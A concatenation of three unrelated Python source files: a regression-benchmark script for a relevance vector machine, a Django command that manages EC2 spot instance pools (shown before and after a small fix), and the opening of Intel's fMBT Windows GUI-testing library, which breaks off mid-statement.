----------
x : np.ndarray
input / estimators
tfun : callable
t = tfun(x)
epsilon : scipy.stats distribution object
noise random variable
base_trafo : callable
for example the sklearn.preprocessing function such as PolynomialFeatures
to transform x into X
model : instance of regression class like RelevanceVectorMachine
Example
-------
>>> model_type = linear_model.RelevanceVectorMachine
>>> model_kwargs = dict(n_iter=250,verbose=False,compute_score=True,init_beta=init_beta,
init_alphas=init_alphas,fit_intercept=False)
>>> runtimes, coefs, models = repeated_regression(x,base_trafo,model_type,t=t,tfun=None,epsilon=None,
model_kwargs=model_kwargs,Nruns=Nruns,return_coefs=True,return_models=True)
"""
X = base_trafo(x.reshape((-1,1)))
assert not t is None or not (tfun is None and epsilon is None), "Either 't' has to be given or 'tfun' and 'epsilon'!"
if t is None:
t = tfun(x) + epsilon.rvs(size=x.shape[0])
runtimes = np.zeros(Nruns)
coefs, models = [], []
for i in range(Nruns):
t0 = time.time()
model = model_type(**model_kwargs)
model.fit(X,t)
runtimes[i] = time.time() - t0
if return_coefs:
coefs.append(model.get_full_weights_vector())
if return_models:
models.append(model)
if return_coefs and not return_models:
return runtimes, np.array(coefs)
elif return_coefs and return_models:
return runtimes, np.array(coefs), models
elif not return_coefs and return_models:
return runtimes, models
return runtimes
def print_run_stats(base_trafo,x,runtimes,coefs,Nruns,show_coefs=True):
print("\n================================================")
s = "X = {} & Nruns = {}:".format(base_trafo(x.reshape((-1,1))).shape,Nruns)
print(s)
print("-"*len(s))
print("\ntime: estimate = {:.4f}s, 2*std = {:.4f}s".format(runtimes.mean(),2*np.std(runtimes,ddof=1)))
if show_coefs:
print("\ncoefs (estimate +- 2*std):")
for i in range(coefs.shape[1]):
print(" {}: {:.4f} +- {:.4f}".format(i,coefs[:,i].mean(axis=0),2*np.std(coefs[:,i],axis=0,ddof=1)))
def plot_summary(models,noise,x,t,X,coefs,base_trafo):
ys = np.array([m.predict(X) for m in models])
y = ys.mean(axis=0)
yerr = 2*ys.std(axis=0,ddof=1)
fig = plt.figure(figsize=(5,7))
# summarizing all predictions
ax = fig.add_subplot(221)
ax.fill_between(x,y-yerr,y+yerr,label="95%",alpha=0.1,color="red")
ax.plot(x,t,'o',label="true",markerfacecolor="None",ms=2.,alpha=.75)
ax.plot(x,y,'-',label="estimate")
ax.set_xlabel("input")
ax.set_ylabel("output")
ax.set_title("y vs t")
plt.legend(loc=0)
coef_est = coefs.mean(axis=0)
coef_err = 2*coefs.std(ddof=1,axis=0)
# summarizing variation of weights
ax2 = fig.add_subplot(222)
ax2.errorbar(np.arange(coef_est.shape[0]),y=coef_est,yerr=coef_err,fmt="o",
markerfacecolor="None",label="RVM w",capsize=3.)
ax2.set_xlabel("weight index")
ax2.set_ylabel("weights")
ax2.set_title("Variation of weights")
plt.legend(loc=0)
# noise precision: model vs true noise
beta2scale = lambda beta: np.sqrt(2./beta)
noise2scale = lambda noise,axis: np.sqrt(2.)*np.std(noise,axis=axis,ddof=1)
betas = np.array([m.beta_ for m in models])
ax3 = fig.add_subplot(223)
ax3.hist(noise,label="true noise",normed=True,bins=100,range=(-5,5))
xlim = ax3.get_xlim()
_xp = np.linspace(xlim[0],xlim[1],100)
for model in models:
norm_rvm = stats.norm(loc=0,scale=beta2scale(model.beta_))
ax3.plot(_xp,norm_rvm.pdf(_xp),'-k',linewidth=.1)
ax3.set_xlabel("noise")
ax3.set_ylabel("frequency")
ax3.set_title("Noise precision:\nmodel vs true noise")
ax3.text(-5,.8,"true scale = {:.3f}".format(noise2scale(noise,0)))
ax3.text(-5,.3,"est. scale = {:.3f}+-{:.3f}".format(beta2scale(betas).mean(),2.*beta2scale(betas).std(ddof=1)))
# noise precision: error distribution vs true noise
ax4 = fig.add_subplot(224)
bins = 100
ax4.hist(noise,label="true noise",normed=True,bins=bins,range=(-5,5))
xlim = ax.get_xlim()
_xp = np.linspace(xlim[0],xlim[1],100)
_X = base_trafo(_xp.reshape((-1,1)))
pred_noise = []
for model in models:
n = model.predict(_X)-t
pred_noise.append(n)
ax4.hist(n,bins=bins,histtype="step",linewidth=.1,normed=True,range=xlim,color="k")
pred_noise = np.array(pred_noise)
ax4.set_xlabel("noise")
ax4.set_ylabel("frequency")
ax4.set_title("Noise precision:\nerr. dis. vs true noise")
ax4.text(-5,1.,"true scale = {:.3f}".format(noise2scale(noise,0)))
ax4.text(-5,.3,"pred scale = {:.3f}+-{:.3f}".format(noise2scale(pred_noise,1).mean(),noise2scale(pred_noise,1).std(ddof=1)*2))
plt.tight_layout()
plt.show()
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
for m in models:
ax.plot(m.mse_,'k-',alpha=.5,lw=.1)
ax.set_xlabel("iteration")
ax.set_ylabel("MSE")
ax.set_yscale("log")
ax.set_title("MSE curves of all regressions")
plt.tight_layout()
plt.show()
if __name__ == "__main__":
epsilon = stats.norm(loc=0,scale=0.01)
tfun = lambda x: np.sin(x) + np.cos(2.*x)
init_beta = distribution_wrapper(stats.halfnorm(scale=1),size=1,single=True)
init_alphas = distribution_wrapper(stats.halfnorm(scale=1),single=False)
Nruns = 100
N = 100
Ms = [3,5,10,20,50]
t_est, t_err = [], []
for M in Ms:
x = np.linspace(0,1,N)
k = M
trafo = FourierFeatures(k=k)
base_trafo = trafo.fit_transform
model_type = RelevanceVectorMachine
model_kwargs = dict(n_iter=250,verbose=False,compute_score=True,init_beta=init_beta,
init_alphas=init_alphas)
runtimes, coefs = regression_speedtest(x,base_trafo,model_type,t=None,tfun=tfun,epsilon=epsilon,
model_kwargs=model_kwargs,Nruns=Nruns,return_coefs=True)
print_run_stats(base_trafo,x,runtimes,coefs,Nruns) |
from django.core.management.base import NoArgsCommand
from ec2spotmanager.models import PoolConfiguration, InstancePool, Instance, INSTANCE_STATE
from django.conf import settings
from ec2spotmanager.management.common import mgmt_lock_required
import warnings
import datetime
import time
import logging
import threading
from django.utils import timezone
from laniakea.laniakea import LaniakeaCommandLine
from laniakea.core.manager import Laniakea
import boto.ec2
import boto.exception
class Command(NoArgsCommand):
help = "Check the status of all bugs we have"
@mgmt_lock_required
def handle_noargs(self, **options):
while True:
self.check_instance_pools()
time.sleep(10)
def check_instance_pools(self):
instance_pools = InstancePool.objects.all()
# Process all instance pools
for instance_pool in instance_pools:
config = instance_pool.config.flatten()
instances = Instance.objects.filter(pool=instance_pool)
instances_missing = config.size
running_instances = []
self.update_pool_instances(instance_pool, instances, config)
for instance in instances:
if instance.status_code == INSTANCE_STATE['running'] or instance.status_code == INSTANCE_STATE['pending']:
instances_missing -= 1
running_instances.append(instance)
else:
# The instance is no longer running, delete it from our database
instance.delete()
# Continue working with the instances we have running
instances = running_instances
if (not instance_pool.last_cycled) or instance_pool.last_cycled < timezone.now() - timezone.timedelta(seconds=config.cycle_interval):
print("[Main] Pool needs to be cycled, terminating all instances...")
instance_pool.last_cycled = timezone.now()
self.terminate_pool_instances(instance_pool, instances, config, terminateByPool=True)
instance_pool.save()
self.update_pool_instances(instance_pool, instances, config)
print("[Main] Pool termination complete.")
# Determine which instances need to be cycled
#outdated_instances = instances.filter(created__lt = timezone.now() - timezone.timedelta(seconds=config.cycle_interval))
# Terminate all instances that need cycling
#for instance in outdated_instances:
# self.terminate_instance(instance, config)
# instances_missing += 1
if instances_missing > 0:
print("[Main] Pool needs %s more instances, starting..." % instances_missing)
self.start_pool_instances(instance_pool, config, count=instances_missing)
elif instances_missing < 0:
# Select the oldest instances we have running and terminate
# them so we meet the size limitation again.
print("[Main] Pool has %s instances over limit, terminating..." % -instances_missing)
instances = Instance.objects.filter(pool=instance_pool).order_by('created')[:-instances_missing]
self.terminate_pool_instances(instance_pool, instances, config)
else:
print("[Main] Pool size ok.")
def get_best_region_zone(self, config):
def get_spot_price_per_region(region_name, profile_name, instance_type):
'''Gets spot prices of the specified region and instance type'''
now = datetime.datetime.now()
start = now - datetime.timedelta(hours=6)
r = boto.ec2.connect_to_region(region_name, profile_name=profile_name).get_spot_price_history(
start_time=start.isoformat(),
end_time=now.isoformat(),
instance_type=instance_type,
product_description="Linux/UNIX") #TODO: Make configurable
return r
def get_price_median(data):
sdata = sorted(data)
n = len(sdata)
if not n % 2:
return (sdata[n / 2] + sdata[n / 2 - 1]) / 2.0
return sdata[n / 2]
from multiprocessing import Pool, cpu_count
pool = Pool(cpu_count())
results = []
for region in config.ec2_allowed_regions:
f = pool.apply_async(get_spot_price_per_region, [region, "laniakea", config.instance_type])
results.append(f)
prices = {}
for result in results:
#r = result.get()
for entry in result.get():
if not entry.region.name in prices:
prices[entry.region.name] = {}
zone = entry.availability_zone
if not zone in prices[entry.region.name]:
prices[entry.region.name][zone] = []
prices[entry.region.name][zone].append(entry.price)
# Calculate median values for all availability zones and best zone/price
best_zone = None
best_region = None
best_median = None
for region in prices:
for zone in prices[region]:
# Do not consider a zone/region combination that has a current
# price higher than the maximum price we are willing to pay,
# even if the median would end up being lower than our maximum.
if prices[region][zone][-1] > config.ec2_max_price:
continue
median = get_price_median(prices[region][zone])
if best_median == None or best_median > median:
best_median = median
best_zone = zone
best_region = region
return (best_region, best_zone)
def create_laniakea_images(self, config):
images = { "default" : {} }
# These are the configuration keys we want to put into the target configuration
# without further preprocessing, except for the adjustment of the key name itself.
keys = [
'ec2_key_name',
'ec2_image_name',
'ec2_instance_type',
'ec2_security_groups',
]
for key in keys:
lkey = key.replace("ec2_", "", 1)
images["default"][lkey] = config[key]
if config.ec2_raw_config:
images["default"].update(config.ec2_raw_config)
return images
def start_pool_instances(self, pool, config, count=1):
""" Start an instance with the given configuration """
images = self.create_laniakea_images(config)
# Figure out where to put our instances
(region, zone) = self.get_best_region_zone(config)
print("Using region %s with availability zone %s" % (region,zone))
instances = []
# Create all our instances as pending, the async thread will update them once
# they have been spawned.
for i in range(0,count):
instance = Instance()
instance.ec2_region = region
instance.status_code = INSTANCE_STATE["pending"]
instance.pool = pool
instance.save()
instances.append(instance)
# This method will run async to spawn our machines
def start_instances_async(pool, config, count, images, region, zone, instances):
userdata = LaniakeaCommandLine.handle_import_tags(config.ec2_userdata)
userdata = LaniakeaCommandLine.handle_tags(userdata, config.ec2_userdata_macros)
if not userdata:
raise RuntimeError("start_instance: Failed to compile userdata")
images["default"]['user_data'] = userdata
images["default"]['placement'] = zone
images["default"]['count'] = count
cluster = Laniakea(images)
try:
cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
except Exception as msg:
logging.error("%s: laniakea failure: %s" % ("start_instances_async", msg))
return
config.ec2_tags['SpotManager-PoolId'] = str(pool.pk)
try:
print("Creating %s instances" % count)
(boto_instances, boto_pending) = cluster.create_spot(config.ec2_max_price, tags=config.ec2_tags, delete_on_termination=True, timeout=20*60)
print("Successfully created %s instances, %s requests timed out and were canceled" % (len(boto_instances), len(boto_pending)))
assert (len(boto_instances) + len(boto_pending)) == len(instances) == count
for i in range(0,len(boto_instances)):
instances[i].hostname = boto_instances[i].public_dns_name
instances[i].ec2_instance_id = boto_instances[i].id
instances[i].status_code = boto_instances[i].state_code
instances[i].save()
if boto_pending:
for i in range(len(boto_instances),len(boto_pending)):
# Delete instances belong to canceled spot requests
print("Deleting instance with id %s (belongs to canceled request)" % instances[i].pk)
instances[i].delete()
except boto.exception.EC2ResponseError as msg:
logging.error("%s: boto failure: %s" % ("start_instances_async", msg))
return
# TODO: We don't get any information back from the async method call here, but should handle failures!
t = threading.Thread(target=start_instances_async, args = (pool, config, count, images, region, zone, instances))
t.start()
def terminate_pool_instances(self, pool, instances, config, terminateByPool=False):
""" Terminate an instance with the given configuration """
instance_ids_by_region = self.get_instance_ids_by_region(instances)
for region in instance_ids_by_region:
cluster = Laniakea(None)
try:
cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
except Exception as msg:
logging.error("%s: laniakea failure: %s" % ("terminate_pool_instances", msg))
return None
try:
if terminateByPool:
boto_instances = cluster.find(filters={"tag:SpotManager-PoolId" : str(pool.pk)})
# Data consistency checks
for boto_instance in boto_instances:
assert ((boto_instance.id in instance_ids_by_region[region])
or (boto_instance.state_code == INSTANCE_STATE['shutting-down']
or boto_instance.state_code == INSTANCE_STATE['terminated']))
cluster.terminate(boto_instances)
else:
print("Terminating %s instances in region %s" % (len(instance_ids_by_region[region]),region))
cluster.terminate(cluster.find(instance_ids=instance_ids_by_region[region]))
except boto.exception.EC2ResponseError as msg:
logging.error("%s: boto failure: %s" % ("terminate_pool_instances", msg))
return 1
def get_instance_ids_by_region(self, instances):
instance_ids_by_region = {}
for instance in instances:
if not instance.ec2_region in instance_ids_by_region:
instance_ids_by_region[instance.ec2_region] = []
instance_ids_by_region[instance.ec2_region].append(instance.ec2_instance_id)
return instance_ids_by_region
def get_instances_by_ids(self, instances):
instances_by_ids = {}
for instance in instances:
instances_by_ids[instance.ec2_instance_id] = instance
return instances_by_ids
def update_pool_instances(self, pool, instances, config):
""" Check the state of the instances in a pool and update it in the database """
instance_ids_by_region = self.get_instance_ids_by_region(instances)
instances_by_ids = self.get_instances_by_ids(instances)
for region in instance_ids_by_region:
cluster = Laniakea(None)
try:
cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
except Exception as msg:
logging.error("%s: laniakea failure: %s" % ("update_pool_instances", msg))
return None
try:
#cluster.find(instance_ids=instance_ids_by_region[region])
boto_instances = cluster.find(filters={"tag:SpotManager-PoolId" : str(pool.pk)})
for boto_instance in boto_instances:
# Whenever we see an instance that is not in our instance list for that region,
# make sure it's a terminated instance because we should never have running instance
#
# We must however not perform this check if we still have pending instances.
# In this case, the thread that is monitoring the pending instances must first
# redeclare them with their proper id in the database before we perform *any*
# updates on it. Otherwise, parallel save operations on the instance object
# might lead to inconsistent states of the database model
if not boto_instance.id in instance_ids_by_region[region]:
if not None in instance_ids_by_region:
assert (boto_instance.state_code == INSTANCE_STATE['shutting-down']
or boto_instance.state_code == INSTANCE_STATE['terminated'])
continue
instance = instances_by_ids[boto_instance.id]
# Check the status code and update if necessary
if instance.status_code != boto_instance.state_code:
instance.status_code = boto_instance.state_code
instance.save()
# If for some reason we don't have a hostname yet,
# update it accordingly.
if not instance.hostname:
instance.hostname = boto_instance.public_dns_name
instance.save()
except boto.exception.EC2ResponseError as msg:
logging.error("%s: boto failure: %s" % ("update_pool_instances", msg))
return 1
Fix another ec2 prefix missing
from django.core.management.base import NoArgsCommand
from ec2spotmanager.models import PoolConfiguration, InstancePool, Instance, INSTANCE_STATE
from django.conf import settings
from ec2spotmanager.management.common import mgmt_lock_required
import warnings
import datetime
import time
import logging
import threading
from django.utils import timezone
from laniakea.laniakea import LaniakeaCommandLine
from laniakea.core.manager import Laniakea
import boto.ec2
import boto.exception
class Command(NoArgsCommand):
help = "Check the status of all bugs we have"
@mgmt_lock_required
def handle_noargs(self, **options):
while True:
self.check_instance_pools()
time.sleep(10)
def check_instance_pools(self):
instance_pools = InstancePool.objects.all()
# Process all instance pools
for instance_pool in instance_pools:
config = instance_pool.config.flatten()
instances = Instance.objects.filter(pool=instance_pool)
instances_missing = config.size
running_instances = []
self.update_pool_instances(instance_pool, instances, config)
for instance in instances:
if instance.status_code == INSTANCE_STATE['running'] or instance.status_code == INSTANCE_STATE['pending']:
instances_missing -= 1
running_instances.append(instance)
else:
# The instance is no longer running, delete it from our database
instance.delete()
# Continue working with the instances we have running
instances = running_instances
if (not instance_pool.last_cycled) or instance_pool.last_cycled < timezone.now() - timezone.timedelta(seconds=config.cycle_interval):
print("[Main] Pool needs to be cycled, terminating all instances...")
instance_pool.last_cycled = timezone.now()
self.terminate_pool_instances(instance_pool, instances, config, terminateByPool=True)
instance_pool.save()
self.update_pool_instances(instance_pool, instances, config)
print("[Main] Pool termination complete.")
# Determine which instances need to be cycled
#outdated_instances = instances.filter(created__lt = timezone.now() - timezone.timedelta(seconds=config.cycle_interval))
# Terminate all instances that need cycling
#for instance in outdated_instances:
# self.terminate_instance(instance, config)
# instances_missing += 1
if instances_missing > 0:
print("[Main] Pool needs %s more instances, starting..." % instances_missing)
self.start_pool_instances(instance_pool, config, count=instances_missing)
elif instances_missing < 0:
# Select the oldest instances we have running and terminate
# them so we meet the size limitation again.
print("[Main] Pool has %s instances over limit, terminating..." % -instances_missing)
instances = Instance.objects.filter(pool=instance_pool).order_by('created')[:-instances_missing]
self.terminate_pool_instances(instance_pool, instances, config)
else:
print("[Main] Pool size ok.")
def get_best_region_zone(self, config):
def get_spot_price_per_region(region_name, profile_name, instance_type):
'''Gets spot prices of the specified region and instance type'''
now = datetime.datetime.now()
start = now - datetime.timedelta(hours=6)
r = boto.ec2.connect_to_region(region_name, profile_name=profile_name).get_spot_price_history(
start_time=start.isoformat(),
end_time=now.isoformat(),
instance_type=instance_type,
product_description="Linux/UNIX") #TODO: Make configurable
return r
def get_price_median(data):
sdata = sorted(data)
n = len(sdata)
if not n % 2:
return (sdata[n / 2] + sdata[n / 2 - 1]) / 2.0
return sdata[n / 2]
from multiprocessing import Pool, cpu_count
pool = Pool(cpu_count())
results = []
for region in config.ec2_allowed_regions:
f = pool.apply_async(get_spot_price_per_region, [region, "laniakea", config.ec2_instance_type])
results.append(f)
prices = {}
for result in results:
#r = result.get()
for entry in result.get():
if not entry.region.name in prices:
prices[entry.region.name] = {}
zone = entry.availability_zone
if not zone in prices[entry.region.name]:
prices[entry.region.name][zone] = []
prices[entry.region.name][zone].append(entry.price)
# Calculate median values for all availability zones and best zone/price
best_zone = None
best_region = None
best_median = None
for region in prices:
for zone in prices[region]:
# Do not consider a zone/region combination that has a current
# price higher than the maximum price we are willing to pay,
# even if the median would end up being lower than our maximum.
if prices[region][zone][-1] > config.ec2_max_price:
continue
median = get_price_median(prices[region][zone])
if best_median == None or best_median > median:
best_median = median
best_zone = zone
best_region = region
return (best_region, best_zone)
def create_laniakea_images(self, config):
images = { "default" : {} }
# These are the configuration keys we want to put into the target configuration
# without further preprocessing, except for the adjustment of the key name itself.
keys = [
'ec2_key_name',
'ec2_image_name',
'ec2_instance_type',
'ec2_security_groups',
]
for key in keys:
lkey = key.replace("ec2_", "", 1)
images["default"][lkey] = config[key]
if config.ec2_raw_config:
images["default"].update(config.ec2_raw_config)
return images
def start_pool_instances(self, pool, config, count=1):
""" Start an instance with the given configuration """
images = self.create_laniakea_images(config)
# Figure out where to put our instances
(region, zone) = self.get_best_region_zone(config)
print("Using region %s with availability zone %s" % (region,zone))
instances = []
# Create all our instances as pending, the async thread will update them once
# they have been spawned.
for i in range(0,count):
instance = Instance()
instance.ec2_region = region
instance.status_code = INSTANCE_STATE["pending"]
instance.pool = pool
instance.save()
instances.append(instance)
# This method will run async to spawn our machines
def start_instances_async(pool, config, count, images, region, zone, instances):
userdata = LaniakeaCommandLine.handle_import_tags(config.ec2_userdata)
userdata = LaniakeaCommandLine.handle_tags(userdata, config.ec2_userdata_macros)
if not userdata:
raise RuntimeError("start_instance: Failed to compile userdata")
images["default"]['user_data'] = userdata
images["default"]['placement'] = zone
images["default"]['count'] = count
cluster = Laniakea(images)
try:
cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
except Exception as msg:
logging.error("%s: laniakea failure: %s" % ("start_instances_async", msg))
return
config.ec2_tags['SpotManager-PoolId'] = str(pool.pk)
try:
print("Creating %s instances" % count)
(boto_instances, boto_pending) = cluster.create_spot(config.ec2_max_price, tags=config.ec2_tags, delete_on_termination=True, timeout=20*60)
print("Successfully created %s instances, %s requests timed out and were canceled" % (len(boto_instances), len(boto_pending)))
assert (len(boto_instances) + len(boto_pending)) == len(instances) == count
for i in range(0,len(boto_instances)):
instances[i].hostname = boto_instances[i].public_dns_name
instances[i].ec2_instance_id = boto_instances[i].id
instances[i].status_code = boto_instances[i].state_code
instances[i].save()
if boto_pending:
for i in range(len(boto_instances),len(boto_pending)):
# Delete instances belong to canceled spot requests
print("Deleting instance with id %s (belongs to canceled request)" % instances[i].pk)
instances[i].delete()
except boto.exception.EC2ResponseError as msg:
logging.error("%s: boto failure: %s" % ("start_instances_async", msg))
return
# TODO: We don't get any information back from the async method call here, but should handle failures!
t = threading.Thread(target=start_instances_async, args = (pool, config, count, images, region, zone, instances))
t.start()
def terminate_pool_instances(self, pool, instances, config, terminateByPool=False):
""" Terminate an instance with the given configuration """
instance_ids_by_region = self.get_instance_ids_by_region(instances)
for region in instance_ids_by_region:
cluster = Laniakea(None)
try:
cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
except Exception as msg:
logging.error("%s: laniakea failure: %s" % ("terminate_pool_instances", msg))
return None
try:
if terminateByPool:
boto_instances = cluster.find(filters={"tag:SpotManager-PoolId" : str(pool.pk)})
# Data consistency checks
for boto_instance in boto_instances:
assert ((boto_instance.id in instance_ids_by_region[region])
or (boto_instance.state_code == INSTANCE_STATE['shutting-down']
or boto_instance.state_code == INSTANCE_STATE['terminated']))
cluster.terminate(boto_instances)
else:
print("Terminating %s instances in region %s" % (len(instance_ids_by_region[region]),region))
cluster.terminate(cluster.find(instance_ids=instance_ids_by_region[region]))
except boto.exception.EC2ResponseError as msg:
logging.error("%s: boto failure: %s" % ("terminate_pool_instances", msg))
return 1
def get_instance_ids_by_region(self, instances):
instance_ids_by_region = {}
for instance in instances:
if not instance.ec2_region in instance_ids_by_region:
instance_ids_by_region[instance.ec2_region] = []
instance_ids_by_region[instance.ec2_region].append(instance.ec2_instance_id)
return instance_ids_by_region
def get_instances_by_ids(self, instances):
instances_by_ids = {}
for instance in instances:
instances_by_ids[instance.ec2_instance_id] = instance
return instances_by_ids
def update_pool_instances(self, pool, instances, config):
""" Check the state of the instances in a pool and update it in the database """
instance_ids_by_region = self.get_instance_ids_by_region(instances)
instances_by_ids = self.get_instances_by_ids(instances)
for region in instance_ids_by_region:
cluster = Laniakea(None)
try:
cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
except Exception as msg:
logging.error("%s: laniakea failure: %s" % ("update_pool_instances", msg))
return None
try:
#cluster.find(instance_ids=instance_ids_by_region[region])
boto_instances = cluster.find(filters={"tag:SpotManager-PoolId" : str(pool.pk)})
for boto_instance in boto_instances:
# Whenever we see an instance that is not in our instance list for that region,
# make sure it's a terminated instance because we should never have running instance
#
# We must however not perform this check if we still have pending instances.
# In this case, the thread that is monitoring the pending instances must first
# redeclare them with their proper id in the database before we perform *any*
# updates on it. Otherwise, parallel save operations on the instance object
# might lead to inconsistent states of the database model
if not boto_instance.id in instance_ids_by_region[region]:
if not None in instance_ids_by_region:
assert (boto_instance.state_code == INSTANCE_STATE['shutting-down']
or boto_instance.state_code == INSTANCE_STATE['terminated'])
continue
instance = instances_by_ids[boto_instance.id]
# Check the status code and update if necessary
if instance.status_code != boto_instance.state_code:
instance.status_code = boto_instance.state_code
instance.save()
# If for some reason we don't have a hostname yet,
# update it accordingly.
if not instance.hostname:
instance.hostname = boto_instance.public_dns_name
instance.save()
except boto.exception.EC2ResponseError as msg:
logging.error("%s: boto failure: %s" % ("update_pool_instances", msg))
return 1
|
# fMBT, free Model Based Testing tool
# Copyright (c) 2014, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
"""
This is library implements fMBT GUITestInterface for Windows
How to setup Windows device under test
1. Install Python 2.X. (For example 2.7.)
2. Add Python to PATH, so that command "python" starts the interpreter.
3. Copy fMBT's pythonshare directory to Windows.
4. In the pythonshare directory, run "python setup.py install"
5. Run:
cd \\python27\\scripts
python pythonshare-server --interface=all --password=xxxxxxxx
How to connect to the device
import fmbtwindows
d = fmbtwindows.Device("IP-ADDRESS-OF-THE-DEVICE", password="xxxxxxxx")
"""
import ast
import base64
import fmbt
import fmbt_config
import fmbtgti
import inspect
import math
import os
import pythonshare
import subprocess
import zlib
try:
import fmbtpng
except ImportError:
fmbtpng = None
if os.name == "nt":
_g_closeFds = False
else:
_g_closeFds = True
def _adapterLog(msg):
fmbt.adapterlog("fmbtwindows %s" % (msg,))
def _run(command, expectedExitStatus=None):
"""
Execute command in child process, return status, stdout, stderr.
"""
if type(command) == str:
shell = True
else:
shell = False
try:
p = subprocess.Popen(command, shell=shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=_g_closeFds)
if expectedExitStatus != None:
out, err = p.communicate()
else:
out, err = ('', None)
except Exception, e:
class fakeProcess(object): pass
p = fakeProcess
p.returncode = 127
out, err = ('', e)
exitStatus = p.returncode
if (expectedExitStatus != None and
exitStatus != expectedExitStatus and
exitStatus not in expectedExitStatus):
msg = "Executing %s failed. Exit status: %s, expected %s" % (
command, exitStatus, expectedExitStatus)
_adapterLog("%s\n stdout: %s\n stderr: %s\n" % (msg, out, err))
raise FMBTWindowsError(msg)
return exitStatus, out, err
_g_keyNames = [
"VK_LBUTTON", "VK_RBUTTON", "VK_CANCEL", "VK_MBUTTON",
"VK_XBUTTON1", "VK_XBUTTON2", "VK_BACK", "VK_TAB", "VK_CLEAR",
"VK_RETURN", "VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_PAUSE",
"VK_CAPITAL", "VK_KANA", "VK_HANGUL", "VK_JUNJA", "VK_FINAL",
"VK_HANJA", "VK_KANJI", "VK_ESCAPE", "VK_CONVERT", "VK_NONCONVERT",
"VK_ACCEPT", "VK_MODECHANGE", "VK_SPACE", "VK_PRIOR", "VK_NEXT",
"VK_END", "VK_HOME", "VK_LEFT", "VK_UP", "VK_RIGHT", "VK_DOWN",
"VK_SELECT", "VK_PRINT", "VK_EXECUTE", "VK_SNAPSHOT", "VK_INSERT",
"VK_DELETE", "VK_HELP", "VK_LWIN", "VK_RWIN", "VK_APPS", "VK_SLEEP",
"VK_NUMPAD0", "VK_NUMPAD1", "VK_NUMPAD2", "VK_NUMPAD3", "VK_NUMPAD4",
"VK_NUMPAD5", "VK_NUMPAD6", "VK_NUMPAD7", "VK_NUMPAD8", "VK_NUMPAD9",
"VK_MULTIPLY", "VK_ADD", "VK_SEPARATOR", "VK_SUBTRACT", "VK_DECIMAL",
"VK_DIVIDE", "VK_F1", "VK_F2", "VK_F3", "VK_F4", "VK_F5", "VK_F6",
"VK_F7", "VK_F8", "VK_F9", "VK_F10", "VK_F11", "VK_F12", "VK_F13",
"VK_F14", "VK_F15", "VK_F16", "VK_F17", "VK_F18", "VK_F19", "VK_F20",
"VK_F21", "VK_F22", "VK_F23", "VK_F24", "VK_NUMLOCK", "VK_SCROLL",
"VK_LSHIFT", "VK_RSHIFT", "VK_LCONTROL", "VK_RCONTROL", "VK_LMENU",
"VK_RMENU", "VK_BROWSER_BACK", "VK_BROWSER_FORWARD",
"VK_BROWSER_REFRESH", "VK_BROWSER_STOP", "VK_BROWSER_SEARCH",
"VK_BROWSER_FAVORITES", "VK_BROWSER_HOME", "VK_VOLUME_MUTE",
"VK_VOLUME_DOWN", "VK_VOLUME_UP", "VK_MEDIA_NEXT_TRACK",
"VK_MEDIA_PREV_TRACK", "VK_MEDIA_STOP", "VK_MEDIA_PLAY_PAUSE",
"VK_LAUNCH_MAIL", "VK_LAUNCH_MEDIA_SELECT", "VK_LAUNCH_APP1",
"VK_LAUNCH_APP2", "VK_OEM_1", "VK_OEM_PLUS", "VK_OEM_COMMA",
"VK_OEM_MINUS", "VK_OEM_PERIOD", "VK_OEM_2", "VK_OEM_3", "VK_OEM_4",
"VK_OEM_5", "VK_OEM_6", "VK_OEM_7", "VK_OEM_8", "VK_OEM_102",
"VK_PROCESSKEY", "VK_PACKET", "VK_ATTN", "VK_CRSEL", "VK_EXSEL",
"VK_EREOF", "VK_PLAY", "VK_ZOOM", "VK_PA1", "VK_OEM_CLEAR", "0", "1",
"2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F",
"G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T",
"U", "V", "W", "X", "Y", "Z"]
# ShowWindow showCmd
SW_HIDE = 0
SW_NORMAL = 1
SW_MINIMIZED = 2
SW_MAXIMIZE = 3
SW_NOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_MINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
SW_DEFAULT = 10
SW_FORCEMINIMIZE = 11
_g_showCmds = [
"SW_HIDE", "SW_NORMAL", "SW_MINIMIZED", "SW_MAXIMIZE", "SW_NOACTIVATE",
"SW_SHOW", "SW_MINIMIZE", "SW_MINNOACTIVE", "SW_SHOWNA", "SW_RESTORE",
"SW_DEFAULT", "SW_FORCEMINIMIZE"]
class ViewItem(fmbtgti.GUIItem):
def __init__(self, view, itemId, parentId, className, text, bbox, dumpFilename):
self._view = view
self._itemId = itemId
self._parentId = parentId
self._className = className
self._text = text
fmbtgti.GUIItem.__init__(self, self._className, bbox, dumpFilename)
def children(self):
return [self._view._viewItems[winfo[0]]
for winfo in self._view._itemTree[self._itemId]]
def __str__(self):
return "ViewItem(%s)" % (self._view._dumpItem(self),)
class View(object):
def __init__(self, dumpFilename, itemTree):
self._dumpFilename = dumpFilename
self._itemTree = itemTree
self._viewItems = {}
for itemId, winfoList in itemTree.iteritems():
for winfo in winfoList:
itemId, parentId, className, text, bbox = winfo
self._viewItems[itemId] = ViewItem(
